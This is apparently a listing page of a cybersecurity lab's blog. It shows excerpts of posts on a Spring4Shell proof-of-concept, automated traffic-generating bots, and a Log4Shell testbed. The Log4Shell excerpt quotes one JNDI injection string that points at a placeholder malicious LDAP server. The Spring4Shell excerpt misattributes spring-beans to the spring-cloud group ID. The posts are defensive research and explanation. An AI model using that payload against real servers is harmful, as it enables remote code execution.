Posts

Spring4Shell PoC in NCL Testbed

In the current Java based web application ecosystem, a framework called Spring is dominantly in use (in more than 60% of applications). On March 30 th , 2022, two critical vulnerabilities, CVE-2022-22963 and CVE-2022-22965, were reported, which pose a major threat to applications developed with the Spring framework. The first vulnerability affected the “spring-cloud-function-context" library (org.springframework.cloud). The latter, CVE-2022-22965, widely known as Spring4Shell, affected “spring-beans” ( org.springframework.cloud ). In this report we focus on Spring4Shell vulnerability, which can allow Remote Code Execution (RCE) on the server that is running the web application, by unauthorized and malicious actors. The library o rg.springframework.cloud: spring-beans, is a typical transitive dependency of a popular framework used widely in Java applications and requires Java Development Kit version 9 (JDK9) or newer to be running. It is a bypass for an older CVE, CVE-2010-1622 th

NCL automatically generates network traffics for web IT environment

Image
  NATIONAL CYBERSECURITY R&D LAB OCTOBOT DEMO - FOR WEB IT ENV ENV = Environment  OVERVIEW Experimentation/testing in a large-scale testbed environment requires a large amount of emulated traffic to ensure realistic scenario execution and better experiment results. A large number of human-generated network activities can emulate traffic from real network users. Deploying and producing a single activity from an individual user is simple, but emulating and automating it from multiple users with a wide range of activities is challenging. We designed a containerized human agent (i.e., bot) to generate a single activity. Thus, a large number of bots can be deployed and controlled by a single orchestration system. Due to the complexity and wide-range usage of container orchestration systems, we need to develop a simpler system that leverages widely-used open-source container orchestrators. So, researchers and scientists can easily use it to define and execute activity requirements with a

Log4Shell testbed released

Image
Log4Shell (CVE-2021-44228) is a serious zero-day security vulnerability in a widely used Java logging library Log4j, disclosed to public on 9 Dec 2021.  It allows a remote attacker to execute arbitrary java program in a victim server with vulnerable Log4j library, by simply sending a carefully crafted string ( e.g.  “${ jndi:ldap :// malicious_ldap_server / malicious_java_program }”) to the victim server. The attacker may trigger this security vulnerability and launch a remote attack by simply changing its web browser user-agent value to such string, or just renaming its iOS device to such string. The damage of this security vulnerability is huge, due to multiple reasons, including    the Java logging library Log4j is widely used in servers,   this security bug appears as early as 2013 and  has existed  for a long time without being discovered by  public ,   the  attacker can easily and remotely execute any malicious program in a victim server.   The root cause of this security vulnera